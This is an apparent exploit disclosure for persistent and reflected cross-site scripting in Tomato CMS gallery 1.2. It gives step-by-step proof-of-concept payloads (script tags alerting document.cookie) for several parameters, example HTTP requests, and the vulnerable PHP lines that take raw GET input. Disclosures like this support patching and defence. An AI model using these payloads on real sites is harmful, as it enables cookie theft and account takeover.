Kod:
# exploit title: persistant xss in cms tomato 1.2 (logged only)
# date: 8.o2.2o11
# author: lemlajt
# software link: http://tomatogallery.yzx.se/
# version: 1.2
# tested on: linux
# cve : 
#

 
poc0.1 : 

1. http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php 
2. click @ "Add Separator" and type: bla'';!--<script>alert(document.cookie)</script>=&{()} in the box
3. persistant.

try:
POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/addSeparator.php
?separatorName=bla'';!--<script>alert(document.cookie)</script>=&{()} HTTP/1.1

more:
cat -n $tomato_dir/ajaxinfo/addSeparator.php 

--- <ut ------ <ut ------ <ut ------ <ut ---
11 	$albumName = 	$_GET["separatorName"];
--- <ut ------ <ut ------ <ut ------ <ut ---

... and more, enjoy! o/

# * csrf?

poc0.2 :

POST http://localhost/www/cmsadmins/tomato_gallery_1_2/ajaxinfo/popupSource.php?popup=create-album&album=undefined HTTP/1.1

;]

in second line of ajaxinfo/popupSource.php we see:
$popup = $_GET['popup'];

replace 'create-album' to: ''script

in source of generated page find your alert:

<li id="item_0" style="margin:0; padding:0; list-style:none;" lang="test;!--&lt;script&gt;alert(document.cookie)&lt;/script&gt;=">
<div class="group" onMouseOver="hoverAlbum('in','1')" onMouseOut="hoverAlbum('out','1')" id="album1">
<div class="stripe"></div>
<div class="albumText" style="position:absolute;" id="albumText1" 
onclick="this.innerHTML = this.lang" lang="test';!--<script>alert(document.cookie)</script>=">test';!--<script>alert(document.cookie)</script>=
</div>


# file inputs?

poc0.3 : some error when typing:
http://localhost/www/cmsadmins/tomato_gallery_1_2/edit/index.php?album=%27%27;!--%3Cscript%3Ealert%28document.cookie%29%3C/script%3E=&{%28%29}#

poc0.4 : xss via GET

$search = '';!--<script>alert(document.cookie)</script>=&{()}


regards